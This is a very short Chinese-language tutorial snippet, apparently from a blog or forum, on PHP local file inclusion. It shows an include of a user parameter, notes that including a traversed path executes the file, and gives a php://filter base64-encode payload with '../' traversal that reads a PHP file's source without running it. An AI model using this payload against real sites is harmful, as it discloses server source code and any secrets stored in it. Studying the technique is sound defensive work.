<?php include['a'] ?>

a.com/a.php?a=../0x007.php  如果是这样写的  会当作php来执行 并不会看到源码。

今天我所说的是 不让0x007.php执行  看到的是0x007.php的源码

利用php:filter//来读取

php://filter/read=convert.base64-encode/resource=../0x007.php 这样读取出来是源码  不进行执行。